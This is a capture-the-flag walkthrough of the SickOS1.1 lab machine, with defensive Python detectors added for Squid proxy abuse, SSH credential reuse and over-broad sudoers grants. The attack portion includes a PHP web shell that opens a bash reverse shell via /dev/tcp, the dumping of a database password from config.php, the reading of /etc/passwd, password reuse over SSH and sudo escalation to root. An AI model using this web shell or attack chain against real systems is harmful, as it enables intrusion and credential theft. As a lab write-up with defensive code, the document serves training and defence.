SickOS1.1

Host discovery

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 03:56 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.131
Host is up (0.00017s latency).
MAC Address: 00:0C:29:EF:C4:2F (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:E5:45:76 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.02 seconds

Port scan

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.131 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 03:58 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00034s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,3128,8080 10.10.10.131 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:00 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00043s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 4.2 (92%), Linux 3.10 - 4.11 (92%), Linux 3.13 (91%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.50 seconds

UDP

└─$ sudo nmap -sU -p22,3128,8080 10.10.10.131 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:03 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00035s latency).

PORT     STATE         SERVICE
22/udp   open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds

Nmap vulnerability scan

└─$ sudo nmap --script=vuln -p22,3128,8080 10.10.10.131 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 04:05 EDT
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EF:C4:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.56 seconds

Squid proxy server

  • Squid is a high-performance application-layer proxy server. Its main functions are cache acceleration and application-layer filtering and control; it supports HTTP, FTP, gopher, SSL, WAIS and other protocols. Besides speeding up access from the internal network, it provides rich access control, authentication and logging; it is practical, convenient and easy to learn, and is a common tool in enterprise network management.

Penetration approach

Directory brute-forcing

└─$ sudo dirb http://10.10.10.131:3128/
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 02:10:08 2023
URL_BASE: http://10.10.10.131:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.131:3128/ ----

-----------------
END_TIME: Mon Jul 24 02:10:24 2023
DOWNLOADED: 4612 - FOUND: 0

└─$ sudo gobuster dir -u http://10.10.10.131:3128 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.131:3128
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 02:11:45 Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for none existing urls. http://10.10.10.131:3128/d1a97665-637e-4b4d-b4d4-061b545acf12 => 400 (Length: 3221). To continue please exclude the status code or the length

Brute-forcing directories through the proxy server

└─$ sudo dirb http://10.10.10.131/ -p http://10.10.10.131:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 02:14:55 2023
URL_BASE: http://10.10.10.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://10.10.10.131:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.131/ ----
+ http://10.10.10.131/cgi-bin/ (CODE:403|SIZE:288)
+ http://10.10.10.131/connect (CODE:200|SIZE:109)
+ http://10.10.10.131/index (CODE:200|SIZE:21)
+ http://10.10.10.131/index.php (CODE:200|SIZE:21)
+ http://10.10.10.131/robots (CODE:200|SIZE:45)
+ http://10.10.10.131/robots.txt (CODE:200|SIZE:45)
+ http://10.10.10.131/server-status (CODE:403|SIZE:293)

-----------------
END_TIME: Mon Jul 24 02:14:58 2023
DOWNLOADED: 4612 - FOUND: 7
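The proxied dirb run above is the security issue with this Squid instance: port 80 is filtered from outside, but an unauthenticated proxy on 3128 relays requests to it anyway. A defender would look for exactly that pattern in Squid's access.log. The following Python script is an added example written for this page, not code from the walkthrough or from Squid; it parses lines in Squid's default native log format and flags requests whose destination is the proxy's own address (assumed here to be 10.10.10.131) or a loopback address. The log lines are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in Squid's default native access.log format:
#   timestamp elapsed client result/status bytes method url user hierarchy/peer type
# They are made up for this example and are not log lines from the SickOS machine.
SAMPLE_ACCESS_LOG = """\
1690179295.101      5 10.10.10.128 TCP_MISS/200 109 GET http://10.10.10.131/connect - DIRECT/10.10.10.131 text/html
1690179295.205      4 10.10.10.128 TCP_MISS/403 288 GET http://10.10.10.131/cgi-bin/ - DIRECT/10.10.10.131 text/html
1690179296.010     80 10.10.10.128 TCP_MISS/200 5120 GET http://example.com/ - DIRECT/93.184.216.34 text/html
1690179297.330      3 10.10.10.128 TCP_MISS/200 21 GET http://127.0.0.1/index.php - DIRECT/127.0.0.1 text/html
1690179298.002    100 10.10.10.128 TCP_TUNNEL/200 2048 CONNECT localhost:22 - DIRECT/127.0.0.1 -
"""

# Assumption: the addresses the proxy host itself listens on. A request to one of
# these uses the proxy to reach a service that the firewall hides from outside.
PROXY_SELF_ADDRESSES = frozenset({"10.10.10.131"})


def parse_native_line(line):
    """Split one native-format line into the fields we need; None for malformed lines."""
    fields = line.split()
    if len(fields) < 10:
        return None
    return {"client": fields[2], "status": fields[3], "method": fields[5], "url": fields[6]}


def destination_host(method, url):
    """Return the destination host. CONNECT requests are logged as 'host:port' with no scheme."""
    if method == "CONNECT":
        host, _, _ = url.rpartition(":")
        return (host or url).strip("[]")
    return urlsplit(url).hostname or ""


def is_self_reaching(host, self_addresses=PROXY_SELF_ADDRESSES):
    """True when the destination is the proxy host itself or a loopback address."""
    if host.lower() == "localhost" or host in self_addresses:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # other hostnames are not resolved here; add a resolver if needed


def find_self_reaching_requests(log_text, self_addresses=PROXY_SELF_ADDRESSES):
    """Return (client, status, method, url) for every request that reached the proxy's own host."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_native_line(line)
        if rec is None:
            continue
        host = destination_host(rec["method"], rec["url"])
        if is_self_reaching(host, self_addresses):
            hits.append((rec["client"], rec["status"], rec["method"], rec["url"]))
    return hits


if __name__ == "__main__":
    for client, status, method, url in find_self_reaching_requests(SAMPLE_ACCESS_LOG):
        print(f"{client} reached the proxy host through the proxy: {method} {url} -> {status}")
```

On the Squid side the matching mitigation is an ACL: the stock squid.conf ships a `to_localhost` ACL with `http_access deny to_localhost`, which covers loopback but not the host's LAN address, so that address has to be added to the deny rule; and above all an unauthenticated proxy should not be reachable from untrusted clients at all.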

Logging into the admin backend

A search reveals that the backend login path is /wolfcms/?/admin/login

The weak password admin/admin logs in successfully

Write a PHP one-liner (web shell) into an article under Pages > Articles:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'");?>

└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.131] 52870
bash: no job control in this shell
www-data@SickOs:/var/www/wolfcms$ whoami
whoami
www-data
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);

// The number of seconds before the check for a new Wolf version times out in case of problems.
define('CHECK_TIMEOUT', 3);

// The full URL of your Wolf CMS install
define('URL_PUBLIC', '/wolfcms/');

// Use httpS for the backend?
// Before enabling this, please make sure you have a working HTTP+SSL installation.
define('USE_HTTPS', false);

// Use HTTP ONLY setting for the Wolf CMS authentication cookie?
// This requests browsers to make the cookie only available through HTTP, so not javascript for example.
// Defaults to false for backwards compatibility.
define('COOKIE_HTTP_ONLY', false);

// The virtual directory name for your Wolf CMS administration section.
define('ADMIN_DIR', 'admin');

// Change this setting to enable mod_rewrite. Set to "true" to remove the "?" in the URL.
// To enable mod_rewrite, you must also change the name of "_.htaccess" in your
// Wolf CMS root directory to ".htaccess"
define('USE_MOD_REWRITE', false);

// Add a suffix to pages (simluating static pages '.html')
define('URL_SUFFIX', '.html');

// Set the timezone of your choice.
// Go here for more information on the available timezones:
// http://php.net/timezones
define('DEFAULT_TIMEZONE', 'Asia/Calcutta');

// Use poormans cron solution instead of real one.
// Only use if cron is truly not available, this works better in terms of timing
// if you have a lot of traffic.
define('USE_POORMANSCRON', false);

// Rough interval in seconds at which poormans cron should trigger.
// No traffic == no poormans cron run.
define('POORMANSCRON_INTERVAL', 3600);

// How long should the browser remember logged in user?
// This relates to Login screen "Remember me for xxx time" checkbox at Backend Login screen
// Default: 1800 (30 minutes)
define ('COOKIE_LIFE', 1800);  // 30 minutes

// Can registered users login to backend using their email address?
// Default: false
define ('ALLOW_LOGIN_WITH_EMAIL', false);

// Should Wolf CMS block login ability on invalid password provided?
// Default: true
define ('DELAY_ON_INVALID_LOGIN', true);

// How long should the login blockade last?
// Default: 30 seconds
define ('DELAY_ONCE_EVERY', 30); // 30 seconds

// First delay starts after Nth failed login attempt
// Default: 3
define ('DELAY_FIRST_AFTER', 3);

// Secure token expiry time (prevents CSRF attacks, etc.)
// If backend user does nothing for this time (eg. click some link)
// his token will expire with appropriate notification
// Default: 900 (15 minutes)
define ('SECURE_TOKEN_EXPIRY', 900);  // 15 minutes

Obtained the database account and password

  • root:john@123

www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

Try logging into SSH with the obtained account and password

└─$ ssh root@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.
root@10.10.10.131's password:
Permission denied, please try again.
root@10.10.10.131's password:

┌──(kali㉿kali)-[~]
└─$ ssh sickos@10.10.10.131
sickos@10.10.10.131's password:
Permission denied, please try again.
sickos@10.10.10.131's password:
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Jul 24 12:19:35 IST 2023

  System load:  0.0               Processes:           117
  Usage of /:   4.3% of 28.42GB   Users logged in:     0
  Memory usage: 12%               IP address for eth0: 10.10.10.131
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

124 packages can be updated.
92 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
sickos@SickOs:~$

  • sickos:john@123 login successful

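The SSH attempts above (root rejected twice, then sickos accepted with the password taken from config.php) are a credential-reuse pattern that a SOC can detect in /var/log/auth.log. The Python script below is an added example for this page, not part of the original walkthrough; it parses sshd lines in the syslog format Ubuntu uses and raises an alert when a source address is accepted after repeated failures, possibly against different usernames, within a short window. The log lines are constructed to mirror the session and are not the machine's real auth.log; the year is an assumption because syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in the syslog style of Ubuntu's /var/log/auth.log. They are
# made up to mirror the session above and are not from the SickOS machine.
SAMPLE_AUTH_LOG = """\
Jul 24 12:19:01 SickOs sshd[1401]: Failed password for root from 10.10.10.128 port 52870 ssh2
Jul 24 12:19:05 SickOs sshd[1401]: Failed password for root from 10.10.10.128 port 52870 ssh2
Jul 24 12:19:20 SickOs sshd[1403]: Failed password for sickos from 10.10.10.128 port 52874 ssh2
Jul 24 12:19:35 SickOs sshd[1403]: Accepted password for sickos from 10.10.10.128 port 52874 ssh2
Jul 24 12:30:00 SickOs sshd[1450]: Accepted publickey for sickos from 10.10.10.50 port 40001 ssh2
"""

# Matches both "Failed password for root ..." and "Failed password for invalid user bob ...".
SSHD_LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_sshd_line(line, year):
    """Return (time, result, method, user, ip) or None. Syslog timestamps carry no year,
    so the caller supplies one (an assumption in this example)."""
    m = SSHD_LINE_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
    return when, m["result"], m["method"], m["user"], m["ip"]


def detect_failures_then_success(log_text, min_failures=2, window=timedelta(minutes=10), year=2023):
    """Alert when a source IP is accepted after at least `min_failures` failed attempts
    (against any usernames) within `window` before the success. Failures against a
    different username than the one finally accepted are the signature of a reused
    or sprayed password."""
    failures = defaultdict(list)  # ip -> [(time, user), ...]
    alerts = []
    for line in log_text.splitlines():
        rec = parse_sshd_line(line, year)
        if rec is None:
            continue
        when, result, method, user, ip = rec
        if result == "Failed":
            failures[ip].append((when, user))
            continue
        recent = [(t, u) for t, u in failures[ip] if when - t <= window]
        if len(recent) >= min_failures:
            alerts.append({
                "ip": ip,
                "user": user,
                "method": method,
                "failures": len(recent),
                "failed_users": sorted({u for _, u in recent}),
                "time": when.isoformat(),
            })
        failures[ip].clear()  # a success ends the sequence for this source
    return alerts


if __name__ == "__main__":
    for alert in detect_failures_then_success(SAMPLE_AUTH_LOG):
        print(f"{alert['ip']} accepted as {alert['user']} after {alert['failures']} failures "
              f"against {alert['failed_users']}")
```

The `failed_users` field is the useful part of the alert: a success for one account right after failures for another from the same source is worth a look even when the failure count is far below a lockout threshold. The root cause here, the same password for the MySQL root account and the sickos shell account, is a credential-hygiene problem that no sshd setting fixes, though `PermitRootLogin no` would at least have made the first two attempts pointless.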
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ uname-a
uname-a: command not found
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~#
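`sudo -l` shows that sickos may run any command as any user, so a reused password turned straight into root. Auditing sudoers for such grants is the defender's counterpart. The Python script below is an added example, not code from the walkthrough; the sudoers content it parses is constructed (the machine's real /etc/sudoers is not shown on the page; only the sickos entry reproduces what `sudo -l` reported), and it handles plain user specifications only, not alias definitions or include directives.

```python
import re

# Constructed sudoers content for the example. The sickos line mirrors the sudo -l
# output above; the other entries are made up to exercise the parser.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
sickos  ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(ALL) NOPASSWD: ALL
#sickos  ALL=(ALL) NOPASSWD: ALL
"""

# Lines that are not user specifications (alias definitions and Defaults) are skipped.
SKIP_KEYWORDS = {"Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias"}

# who  hosts = (runas) commands   -- the runas part is optional and defaults to root
USER_SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_user_specs(text):
    """Yield (who, hosts, runas, nopasswd, [commands]) for each user specification line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.split()[0] in SKIP_KEYWORDS:
            continue
        m = USER_SPEC_RE.match(line)
        if not m:
            continue
        cmds = m["cmds"]
        nopasswd = "NOPASSWD:" in cmds
        # Drop tag prefixes (NOPASSWD:, PASSWD:, NOEXEC:, SETENV:, ...) before splitting.
        cleaned = re.sub(r"\b[A-Z]+:\s*", "", cmds)
        commands = [c.strip() for c in cleaned.split(",") if c.strip()]
        yield m["who"], m["hosts"], m["runas"] or "root", nopasswd, commands


def audit_sudoers(text):
    """Return a finding for every grant whose command list contains ALL.
    root's own stock entry is skipped because it is the distribution default."""
    findings = []
    for who, hosts, runas, nopasswd, commands in parse_user_specs(text):
        if who == "root" or "ALL" not in commands:
            continue
        findings.append({"who": who, "hosts": hosts, "runas": runas, "nopasswd": nopasswd})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "without a password" if f["nopasswd"] else "with their own password"
        print(f"{f['who']} may run ANY command as ({f['runas']}) {tag}")
```

A grant like `(ALL : ALL) ALL` for an interactive user means that user's password is effectively the root password; the audit turns that into a list that can be compared against the accounts that actually need full administrative rights. In a real environment, run it over `/etc/sudoers.d/*` as well, since Ubuntu includes that directory.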

Getting the flag

root@SickOs:~# cd /root
root@SickOs:/root# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

root@SickOs:/root#